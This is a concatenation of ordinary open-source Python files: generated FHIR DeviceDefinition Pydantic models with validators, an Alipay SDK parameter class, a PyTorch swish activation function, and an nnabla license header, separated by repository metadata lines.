title="The circumstances that form the setting for using the device",
description=None,
# if property is element of this resource.
element_property=True,
)
warning: typing.List[fhirtypes.CodeableConceptType] = Field(
None,
alias="warning",
title=(
"Specific hazard alert information that a user needs to know before "
"using the device"
),
description=None,
# if property is element of this resource.
element_property=True,
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionGuideline`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"useContext",
"usageInstruction",
"relatedArtifact",
"indication",
"contraindication",
"warning",
"intendedUse",
]
class DeviceDefinitionHasPart(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
A device, part of the current one.
A device that is part (for example a component) of the present device.
"""
resource_type = Field("DeviceDefinitionHasPart", const=True)
count: fhirtypes.Integer = Field(
None,
alias="count",
title="Number of occurrences of the part",
description="Number of instances of the component device in the current device.",
# if property is element of this resource.
element_property=True,
)
count__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_count", title="Extension field for ``count``."
)
reference: fhirtypes.ReferenceType = Field(
...,
alias="reference",
title="Reference to the part",
description="Reference to the device that is part of the current device.",
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["DeviceDefinition"],
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionHasPart`` according specification,
with preserving original sequence order.
"""
return ["id", "extension", "modifierExtension", "reference", "count"]
class DeviceDefinitionLink(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
An associated device, attached to, used with, communicating with or linking
a previous or new device model to the focal device.
"""
resource_type = Field("DeviceDefinitionLink", const=True)
relatedDevice: fhirtypes.CodeableReferenceType = Field(
...,
alias="relatedDevice",
title="A reference to the linked device",
description=None,
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["DeviceDefinition"],
)
relation: fhirtypes.CodingType = Field(
...,
alias="relation",
title=(
"The type indicates the relationship of the related device to the "
"device instance"
),
description=None,
# if property is element of this resource.
element_property=True,
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionLink`` according specification,
with preserving original sequence order.
"""
return ["id", "extension", "modifierExtension", "relation", "relatedDevice"]
class DeviceDefinitionMaterial(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
A substance used to create the material(s) of which the device is made.
"""
resource_type = Field("DeviceDefinitionMaterial", const=True)
allergenicIndicator: bool = Field(
None,
alias="allergenicIndicator",
title="Whether the substance is a known or suspected allergen",
description=None,
# if property is element of this resource.
element_property=True,
)
allergenicIndicator__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None,
alias="_allergenicIndicator",
title="Extension field for ``allergenicIndicator``.",
)
alternate: bool = Field(
None,
alias="alternate",
title="Indicates an alternative material of the device",
description=None,
# if property is element of this resource.
element_property=True,
)
alternate__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_alternate", title="Extension field for ``alternate``."
)
substance: fhirtypes.CodeableConceptType = Field(
...,
alias="substance",
title=(
"A relevant substance that the device contains, may contain, or is made"
" of"
),
description=(
"A substance that the device contains, may contain, or is made of - for"
" example latex - to be used to determine patient compatibility. This "
"is not intended to represent the composition of the device, only the "
"clinically relevant materials."
),
# if property is element of this resource.
element_property=True,
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionMaterial`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"substance",
"alternate",
"allergenicIndicator",
]
class DeviceDefinitionPackaging(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Information about the packaging of the device, i.e. how the device is
packaged.
"""
resource_type = Field("DeviceDefinitionPackaging", const=True)
count: fhirtypes.Integer = Field(
None,
alias="count",
title="The number of items contained in the package (devices or sub-packages)",
description=None,
# if property is element of this resource.
element_property=True,
)
count__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_count", title="Extension field for ``count``."
)
distributor: typing.List[
fhirtypes.DeviceDefinitionPackagingDistributorType
] = Field(
None,
alias="distributor",
title="An organization that distributes the packaged device",
description=None,
# if property is element of this resource.
element_property=True,
)
identifier: fhirtypes.IdentifierType = Field(
None,
alias="identifier",
title="Business identifier of the packaged medication",
description="The business identifier of the packaged medication.",
# if property is element of this resource.
element_property=True,
)
packaging: typing.List[fhirtypes.DeviceDefinitionPackagingType] = Field(
None,
alias="packaging",
title="Allows packages within packages",
description=None,
# if property is element of this resource.
element_property=True,
)
type: fhirtypes.CodeableConceptType = Field(
None,
alias="type",
title="A code that defines the specific type of packaging",
description=None,
# if property is element of this resource.
element_property=True,
)
udiDeviceIdentifier: typing.List[
fhirtypes.DeviceDefinitionUdiDeviceIdentifierType
] = Field(
None,
alias="udiDeviceIdentifier",
title="Unique Device Identifier (UDI) Barcode string on the packaging",
description=None,
# if property is element of this resource.
element_property=True,
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionPackaging`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"identifier",
"type",
"count",
"distributor",
"udiDeviceIdentifier",
"packaging",
]
class DeviceDefinitionPackagingDistributor(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
An organization that distributes the packaged device.
"""
resource_type = Field("DeviceDefinitionPackagingDistributor", const=True)
name: fhirtypes.String = Field(
None,
alias="name",
title="Distributor's human-readable name",
description=None,
# if property is element of this resource.
element_property=True,
)
name__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_name", title="Extension field for ``name``."
)
organizationReference: typing.List[fhirtypes.ReferenceType] = Field(
None,
alias="organizationReference",
title="Distributor as an Organization resource",
description=None,
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Organization"],
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionPackagingDistributor`` according specification,
with preserving original sequence order.
"""
return ["id", "extension", "modifierExtension", "name", "organizationReference"]
class DeviceDefinitionProperty(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Inherent, essentially fixed, characteristics of this kind of device, e.g.,
time properties, size, etc.
Static or essentially fixed characteristics or features of this kind of
device that are otherwise not captured in more specific attributes, e.g.,
time or timing attributes, resolution, accuracy, and physical attributes.
"""
resource_type = Field("DeviceDefinitionProperty", const=True)
type: fhirtypes.CodeableConceptType = Field(
...,
alias="type",
title="Code that specifies the property being represented",
description=(
"Code that specifies the property such as a resolution or color being "
"represented."
),
# if property is element of this resource.
element_property=True,
)
valueAttachment: fhirtypes.AttachmentType = Field(
None,
alias="valueAttachment",
title="Value of the property",
description=(
"The value of the property specified by the associated property.type "
"code."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e value[x]
one_of_many="value",
one_of_many_required=True,
)
valueBoolean: bool = Field(
None,
alias="valueBoolean",
title="Value of the property",
description=(
"The value of the property specified by the associated property.type "
"code."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e value[x]
one_of_many="value",
one_of_many_required=True,
)
valueBoolean__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_valueBoolean", title="Extension field for ``valueBoolean``."
)
valueCodeableConcept: fhirtypes.CodeableConceptType = Field(
None,
alias="valueCodeableConcept",
title="Value of the property",
description=(
"The value of the property specified by the associated property.type "
"code."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e value[x]
one_of_many="value",
one_of_many_required=True,
)
valueInteger: fhirtypes.Integer = Field(
None,
alias="valueInteger",
title="Value of the property",
description=(
"The value of the property specified by the associated property.type "
"code."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e value[x]
one_of_many="value",
one_of_many_required=True,
)
valueInteger__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_valueInteger", title="Extension field for ``valueInteger``."
)
valueQuantity: fhirtypes.QuantityType = Field(
None,
alias="valueQuantity",
title="Value of the property",
description=(
"The value of the property specified by the associated property.type "
"code."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e value[x]
one_of_many="value",
one_of_many_required=True,
)
valueRange: fhirtypes.RangeType = Field(
None,
alias="valueRange",
title="Value of the property",
description=(
"The value of the property specified by the associated property.type "
"code."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e value[x]
one_of_many="value",
one_of_many_required=True,
)
valueString: fhirtypes.String = Field(
None,
alias="valueString",
title="Value of the property",
description=(
"The value of the property specified by the associated property.type "
"code."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e value[x]
one_of_many="value",
one_of_many_required=True,
)
valueString__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_valueString", title="Extension field for ``valueString``."
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionProperty`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"type",
"valueQuantity",
"valueCodeableConcept",
"valueString",
"valueBoolean",
"valueInteger",
"valueRange",
"valueAttachment",
]
@root_validator(pre=True, allow_reuse=True)
def validate_one_of_many_2683(
cls, values: typing.Dict[str, typing.Any]
) -> typing.Dict[str, typing.Any]:
"""https://www.hl7.org/fhir/formats.html#choice
A few elements have a choice of more than one data type for their content.
All such elements have a name that takes the form nnn[x].
The "nnn" part of the name is constant, and the "[x]" is replaced with
the title-cased name of the type that is actually used.
The table view shows each of these names explicitly.
Elements that have a choice of data type cannot repeat - they must have a
maximum cardinality of 1. When constructing an instance of an element with a
choice of types, the authoring system must create a single element with a
data type chosen from among the list of permitted data types.
"""
one_of_many_fields = {
"value": [
"valueAttachment",
"valueBoolean",
"valueCodeableConcept",
"valueInteger",
"valueQuantity",
"valueRange",
"valueString",
]
}
for prefix, fields in one_of_many_fields.items():
assert cls.__fields__[fields[0]].field_info.extra["one_of_many"] == prefix
required = (
cls.__fields__[fields[0]].field_info.extra["one_of_many_required"]
is True
)
found = False
for field in fields:
if field in values and values[field] is not None:
if found is True:
raise ValueError(
"Any of one field value is expected from "
f"this list {fields}, but got multiple!"
)
else:
found = True
if required is True and found is False:
raise ValueError(f"Expect any of field value from this list {fields}.")
return values
class DeviceDefinitionRegulatoryIdentifier(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Regulatory identifier(s) associated with this device.
Identifier associated with the regulatory documentation (certificates,
technical documentation, post-market surveillance documentation and
reports) of a set of device models sharing the same intended purpose, risk
class and essential design and manufacturing characteristics. One example
is the Basic UDI-DI in Europe.
"""
resource_type = Field("DeviceDefinitionRegulatoryIdentifier", const=True)
deviceIdentifier: fhirtypes.String = Field(
None,
alias="deviceIdentifier",
title="The identifier itself",
description=None,
# if property is element of this resource.
element_property=True,
element_required=True,
)
deviceIdentifier__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None,
alias="_deviceIdentifier",
title="Extension field for ``deviceIdentifier``.",
)
issuer: fhirtypes.Uri = Field(
None,
alias="issuer",
title="The organization that issued this identifier",
description=None,
# if property is element of this resource.
element_property=True,
element_required=True,
)
issuer__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_issuer", title="Extension field for ``issuer``."
)
jurisdiction: fhirtypes.Uri = Field(
None,
alias="jurisdiction",
title="The jurisdiction to which the deviceIdentifier applies",
description=None,
# if property is element of this resource.
element_property=True,
element_required=True,
)
jurisdiction__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_jurisdiction", title="Extension field for ``jurisdiction``."
)
type: fhirtypes.Code = Field(
None,
alias="type",
title="basic | master | license",
description="The type of identifier itself.",
# if property is element of this resource.
element_property=True,
element_required=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["basic", "master", "license"],
)
type__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_type", title="Extension field for ``type``."
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionRegulatoryIdentifier`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"type",
"deviceIdentifier",
"issuer",
"jurisdiction",
]
@root_validator(pre=True, allow_reuse=True)
def validate_required_primitive_elements_3904(
cls, values: typing.Dict[str, typing.Any]
) -> typing.Dict[str, typing.Any]:
"""https://www.hl7.org/fhir/extensibility.html#Special-Case
In some cases, implementers might find that they do not have appropriate data for
an element with minimum cardinality = 1. In this case, the element must be present,
but unless the resource or a profile on it has made the actual value of the primitive
data type mandatory, it is possible to provide an extension that explains why
the primitive value is not present.
"""
required_fields = [
("deviceIdentifier", "deviceIdentifier__ext"),
("issuer", "issuer__ext"),
("jurisdiction", "jurisdiction__ext"),
("type", "type__ext"),
]
_missing = object()
def _fallback():
return ""
errors: typing.List["ErrorWrapper"] = []
for name, ext in required_fields:
field = cls.__fields__[name]
ext_field = cls.__fields__[ext]
value = values.get(field.alias, _missing)
if value not in (_missing, None):
continue
ext_value = values.get(ext_field.alias, _missing)
missing_ext = True
if ext_value not in (_missing, None):
if isinstance(ext_value, dict):
missing_ext = len(ext_value.get("extension", [])) == 0
elif (
getattr(ext_value.__class__, "get_resource_type", _fallback)()
== "FHIRPrimitiveExtension"
):
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
else:
validate_pass = True
for validator in ext_field.type_.__get_validators__():
try:
ext_value = validator(v=ext_value)
except ValidationError as exc:
errors.append(ErrorWrapper(exc, loc=ext_field.alias))
validate_pass = False
if not validate_pass:
continue
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
if missing_ext:
if value is _missing:
errors.append(ErrorWrapper(MissingError(), loc=field.alias))
else:
errors.append(
ErrorWrapper(NoneIsNotAllowedError(), loc=field.alias)
)
if len(errors) > 0:
raise ValidationError(errors, cls) # type: ignore
return values
class DeviceDefinitionUdiDeviceIdentifier(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Unique Device Identifier (UDI) Barcode string.
Unique device identifier (UDI) assigned to device label or package. Note
that the Device may include multiple udiCarriers as it either may include
just the udiCarrier for the jurisdiction it is sold, or for multiple
jurisdictions it could have been sold.
"""
resource_type = Field("DeviceDefinitionUdiDeviceIdentifier", const=True)
deviceIdentifier: fhirtypes.String = Field(
None,
alias="deviceIdentifier",
title=(
"The identifier that is to be associated with every Device that "
"references this DeviceDefintiion for the issuer and jurisdiction "
"provided in the DeviceDefinition.udiDeviceIdentifier"
),
description=None,
# if property is element of this resource.
element_property=True,
element_required=True,
)
deviceIdentifier__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None,
alias="_deviceIdentifier",
title="Extension field for ``deviceIdentifier``.",
)
issuer: fhirtypes.Uri = Field(
None,
alias="issuer",
title="The organization that assigns the identifier algorithm",
description=None,
# if property is element of this resource.
element_property=True,
element_required=True,
)
issuer__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_issuer", title="Extension field for ``issuer``."
)
jurisdiction: fhirtypes.Uri = Field(
None,
alias="jurisdiction",
title="The jurisdiction to which the deviceIdentifier applies",
description=None,
# if property is element of this resource.
element_property=True,
element_required=True,
)
jurisdiction__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_jurisdiction", title="Extension field for ``jurisdiction``."
)
marketDistribution: typing.List[
fhirtypes.DeviceDefinitionUdiDeviceIdentifierMarketDistributionType
] = Field(
None,
alias="marketDistribution",
title="Indicates whether and when the device is available on the market",
description="Indicates where and when the device is available on the market.",
# if property is element of this resource.
element_property=True,
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionUdiDeviceIdentifier`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"deviceIdentifier",
"issuer",
"jurisdiction",
"marketDistribution",
]
@root_validator(pre=True, allow_reuse=True)
def validate_required_primitive_elements_3716(
cls, values: typing.Dict[str, typing.Any]
) -> typing.Dict[str, typing.Any]:
"""https://www.hl7.org/fhir/extensibility.html#Special-Case
In some cases, implementers might find that they do not have appropriate data for
an element with minimum cardinality = 1. In this case, the element must be present,
but unless the resource or a profile on it has made the actual value of the primitive
data type mandatory, it is possible to provide an extension that explains why
the primitive value is not present.
"""
required_fields = [
("deviceIdentifier", "deviceIdentifier__ext"),
("issuer", "issuer__ext"),
("jurisdiction", "jurisdiction__ext"),
]
_missing = object()
def _fallback():
return ""
errors: typing.List["ErrorWrapper"] = []
for name, ext in required_fields:
field = cls.__fields__[name]
ext_field = cls.__fields__[ext]
value = values.get(field.alias, _missing)
if value not in (_missing, None):
continue
ext_value = values.get(ext_field.alias, _missing)
missing_ext = True
if ext_value not in (_missing, None):
if isinstance(ext_value, dict):
missing_ext = len(ext_value.get("extension", [])) == 0
elif (
getattr(ext_value.__class__, "get_resource_type", _fallback)()
== "FHIRPrimitiveExtension"
):
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
else:
validate_pass = True
for validator in ext_field.type_.__get_validators__():
try:
ext_value = validator(v=ext_value)
except ValidationError as exc:
errors.append(ErrorWrapper(exc, loc=ext_field.alias))
validate_pass = False
if not validate_pass:
continue
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
if missing_ext:
if value is _missing:
errors.append(ErrorWrapper(MissingError(), loc=field.alias))
else:
errors.append(
ErrorWrapper(NoneIsNotAllowedError(), loc=field.alias)
)
if len(errors) > 0:
raise ValidationError(errors, cls) # type: ignore
return values
class DeviceDefinitionUdiDeviceIdentifierMarketDistribution(
backboneelement.BackboneElement
):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Indicates whether and when the device is available on the market.
Indicates where and when the device is available on the market.
"""
resource_type = Field(
"DeviceDefinitionUdiDeviceIdentifierMarketDistribution", const=True
)
marketPeriod: fhirtypes.PeriodType = Field(
...,
alias="marketPeriod",
title="Begin and end dates for the commercial distribution of the device",
description=None,
# if property is element of this resource.
element_property=True,
)
subJurisdiction: fhirtypes.Uri = Field(
None,
alias="subJurisdiction",
title="National state or territory where the device is commercialized",
description=(
"National state or territory to which the marketDistribution recers, "
"typically where the device is commercialized."
),
# if property is element of this resource.
element_property=True,
element_required=True,
)
subJurisdiction__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_subJurisdiction", title="Extension field for ``subJurisdiction``."
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionUdiDeviceIdentifierMarketDistribution`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"marketPeriod",
"subJurisdiction",
]
@root_validator(pre=True, allow_reuse=True)
def validate_required_primitive_elements_5604(
cls, values: typing.Dict[str, typing.Any]
) -> typing.Dict[str, typing.Any]:
"""https://www.hl7.org/fhir/extensibility.html#Special-Case
In some cases, implementers might find that they do not have appropriate data for
an element with minimum cardinality = 1. In this case, the element must be present,
but unless the resource or a profile on it has made the actual value of the primitive
data type mandatory, it is possible to provide an extension that explains why
the primitive value is not present.
"""
required_fields = [("subJurisdiction", "subJurisdiction__ext")]
_missing = object()
def _fallback():
return ""
errors: typing.List["ErrorWrapper"] = []
for name, ext in required_fields:
field = cls.__fields__[name]
ext_field = cls.__fields__[ext]
value = values.get(field.alias, _missing)
if value not in (_missing, None):
continue
ext_value = values.get(ext_field.alias, _missing)
missing_ext = True
if ext_value not in (_missing, None):
if isinstance(ext_value, dict):
missing_ext = len(ext_value.get("extension", [])) == 0
elif (
getattr(ext_value.__class__, "get_resource_type", _fallback)()
== "FHIRPrimitiveExtension"
):
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
else:
validate_pass = True
for validator in ext_field.type_.__get_validators__():
try:
ext_value = validator(v=ext_value)
except ValidationError as exc:
errors.append(ErrorWrapper(exc, loc=ext_field.alias))
validate_pass = False
if not validate_pass:
continue
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
if missing_ext:
if value is _missing:
errors.append(ErrorWrapper(MissingError(), loc=field.alias))
else:
errors.append(
ErrorWrapper(NoneIsNotAllowedError(), loc=field.alias)
)
if len(errors) > 0:
raise ValidationError(errors, cls) # type: ignore
return values
class DeviceDefinitionVersion(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
The version of the device or software.
"""
resource_type = Field("DeviceDefinitionVersion", const=True)
component: fhirtypes.IdentifierType = Field(
None,
alias="component",
title=(
"The hardware or software module of the device to which the version "
"applies"
),
description=None,
# if property is element of this resource.
element_property=True,
)
type: fhirtypes.CodeableConceptType = Field(
None,
alias="type",
title="The type of the device version, e.g. manufacturer, approved, internal",
description=None,
# if property is element of this resource.
element_property=True,
)
value: fhirtypes.String = Field(
None,
alias="value",
title="The version text",
description=None,
# if property is element of this resource.
element_property=True,
element_required=True,
)
value__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_value", title="Extension field for ``value``."
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionVersion`` according specification,
with preserving original sequence order.
"""
return ["id", "extension", "modifierExtension", "type", "component", "value"]
@root_validator(pre=True, allow_reuse=True)
def validate_required_primitive_elements_2545(
cls, values: typing.Dict[str, typing.Any]
) -> typing.Dict[str, typing.Any]:
"""https://www.hl7.org/fhir/extensibility.html#Special-Case
In some cases, implementers might find that they do not have appropriate data for
an element with minimum cardinality = 1. In this case, the element must be present,
but unless the resource or a profile on it has made the actual value of the primitive
data type mandatory, it is possible to provide an extension that explains why
the primitive value is not present.
"""
required_fields = [("value", "value__ext")]
_missing = object()
def _fallback():
return ""
errors: typing.List["ErrorWrapper"] = []
for name, ext in required_fields:
field = cls.__fields__[name]
ext_field = cls.__fields__[ext]
value = values.get(field.alias, _missing)
if value not in (_missing, None):
continue
ext_value = values.get(ext_field.alias, _missing)
missing_ext = True
if ext_value not in (_missing, None):
if isinstance(ext_value, dict):
missing_ext = len(ext_value.get("extension", [])) == 0
elif (
getattr(ext_value.__class__, "get_resource_type", _fallback)()
== "FHIRPrimitiveExtension"
):
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
else:
validate_pass = True
for validator in ext_field.type_.__get_validators__():
try:
ext_value = validator(v=ext_value)
except ValidationError as exc:
errors.append(ErrorWrapper(exc, loc=ext_field.alias))
validate_pass = False
if not validate_pass:
continue
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
if missing_ext:
if value is _missing:
errors.append(ErrorWrapper(MissingError(), loc=field.alias))
else:
errors.append(
ErrorWrapper(NoneIsNotAllowedError(), loc=field.alias)
)
if len(errors) > 0:
raise ValidationError(errors, cls) # type: ignore
return values
|
3419ac0689ec94e735cf6f995f8f6ba96aeb0453
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/ScenePayBusinessParamDTO.py
|
906fc40af9648df5d476cfe4684e2050ed3bb7d0
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 4,458
|
py
|
ScenePayBusinessParamDTO.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class ScenePayBusinessParamDTO(object):
def __init__(self):
self._custom_params = None
self._mall_cell_id = None
self._mall_cell_type = None
self._mall_id = None
self._mall_pid = None
self._plan_id = None
self._real_store_id = None
self._voucher_id = None
@property
def custom_params(self):
return self._custom_params
@custom_params.setter
def custom_params(self, value):
self._custom_params = value
@property
def mall_cell_id(self):
return self._mall_cell_id
@mall_cell_id.setter
def mall_cell_id(self, value):
self._mall_cell_id = value
@property
def mall_cell_type(self):
return self._mall_cell_type
@mall_cell_type.setter
def mall_cell_type(self, value):
self._mall_cell_type = value
@property
def mall_id(self):
return self._mall_id
@mall_id.setter
def mall_id(self, value):
self._mall_id = value
@property
def mall_pid(self):
return self._mall_pid
@mall_pid.setter
def mall_pid(self, value):
self._mall_pid = value
@property
def plan_id(self):
return self._plan_id
@plan_id.setter
def plan_id(self, value):
self._plan_id = value
@property
def real_store_id(self):
return self._real_store_id
@real_store_id.setter
def real_store_id(self, value):
self._real_store_id = value
@property
def voucher_id(self):
return self._voucher_id
@voucher_id.setter
def voucher_id(self, value):
self._voucher_id = value
def to_alipay_dict(self):
params = dict()
if self.custom_params:
if hasattr(self.custom_params, 'to_alipay_dict'):
params['custom_params'] = self.custom_params.to_alipay_dict()
else:
params['custom_params'] = self.custom_params
if self.mall_cell_id:
if hasattr(self.mall_cell_id, 'to_alipay_dict'):
params['mall_cell_id'] = self.mall_cell_id.to_alipay_dict()
else:
params['mall_cell_id'] = self.mall_cell_id
if self.mall_cell_type:
if hasattr(self.mall_cell_type, 'to_alipay_dict'):
params['mall_cell_type'] = self.mall_cell_type.to_alipay_dict()
else:
params['mall_cell_type'] = self.mall_cell_type
if self.mall_id:
if hasattr(self.mall_id, 'to_alipay_dict'):
params['mall_id'] = self.mall_id.to_alipay_dict()
else:
params['mall_id'] = self.mall_id
if self.mall_pid:
if hasattr(self.mall_pid, 'to_alipay_dict'):
params['mall_pid'] = self.mall_pid.to_alipay_dict()
else:
params['mall_pid'] = self.mall_pid
if self.plan_id:
if hasattr(self.plan_id, 'to_alipay_dict'):
params['plan_id'] = self.plan_id.to_alipay_dict()
else:
params['plan_id'] = self.plan_id
if self.real_store_id:
if hasattr(self.real_store_id, 'to_alipay_dict'):
params['real_store_id'] = self.real_store_id.to_alipay_dict()
else:
params['real_store_id'] = self.real_store_id
if self.voucher_id:
if hasattr(self.voucher_id, 'to_alipay_dict'):
params['voucher_id'] = self.voucher_id.to_alipay_dict()
else:
params['voucher_id'] = self.voucher_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = ScenePayBusinessParamDTO()
if 'custom_params' in d:
o.custom_params = d['custom_params']
if 'mall_cell_id' in d:
o.mall_cell_id = d['mall_cell_id']
if 'mall_cell_type' in d:
o.mall_cell_type = d['mall_cell_type']
if 'mall_id' in d:
o.mall_id = d['mall_id']
if 'mall_pid' in d:
o.mall_pid = d['mall_pid']
if 'plan_id' in d:
o.plan_id = d['plan_id']
if 'real_store_id' in d:
o.real_store_id = d['real_store_id']
if 'voucher_id' in d:
o.voucher_id = d['voucher_id']
return o
|
7d7dd88d933f092b2490dafd70ebf61d23d65f02
|
98f1a0bfa5b20a0b81e9e555d76e706c62d949c9
|
/examples/pytorch/dimenet/modules/activations.py
|
c9bfbd05f7c36a243db2beae36f60e60e4840c88
|
[
"Apache-2.0"
] |
permissive
|
dmlc/dgl
|
3a8fbca3a7f0e9adf6e69679ad62948df48dfc42
|
bbc8ff6261f2e0d2b5982e992b6fbe545e2a4aa1
|
refs/heads/master
| 2023-08-31T16:33:21.139163
| 2023-08-31T07:49:22
| 2023-08-31T07:49:22
| 130,375,797
| 12,631
| 3,482
|
Apache-2.0
| 2023-09-14T15:48:24
| 2018-04-20T14:49:09
|
Python
|
UTF-8
|
Python
| false
| false
| 183
|
py
|
activations.py
|
import torch
def swish(x):
"""
Swish activation function,
from Ramachandran, Zopf, Le 2017. "Searching for Activation Functions"
"""
return x * torch.sigmoid(x)
|
de104af652c917b003726da54d0cd11fad9ae9dc
|
d6aae799e18e907fb413b715200c7832252a87e5
|
/image-classification/imagenet/obsolete/args.py
|
aca80893f6e5fdf4e1834623b1a40d3b47ec3d83
|
[
"BSD-3-Clause",
"MIT",
"LicenseRef-scancode-proprietary-license",
"Apache-2.0",
"CC-BY-NC-4.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
sony/nnabla-examples
|
0d0bbd5df3028996e790bcf07248fdb0932697d1
|
41f71faa6efff7774a76bbd5af3198322a90a6ab
|
refs/heads/master
| 2023-09-04T03:45:54.023899
| 2023-08-22T03:31:21
| 2023-08-22T03:31:21
| 109,625,584
| 308
| 108
|
Apache-2.0
| 2023-08-22T03:31:23
| 2017-11-05T23:30:40
|
Python
|
UTF-8
|
Python
| false
| false
| 5,516
|
py
|
args.py
|
# Copyright 2020,2021 Sony Corporation.
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
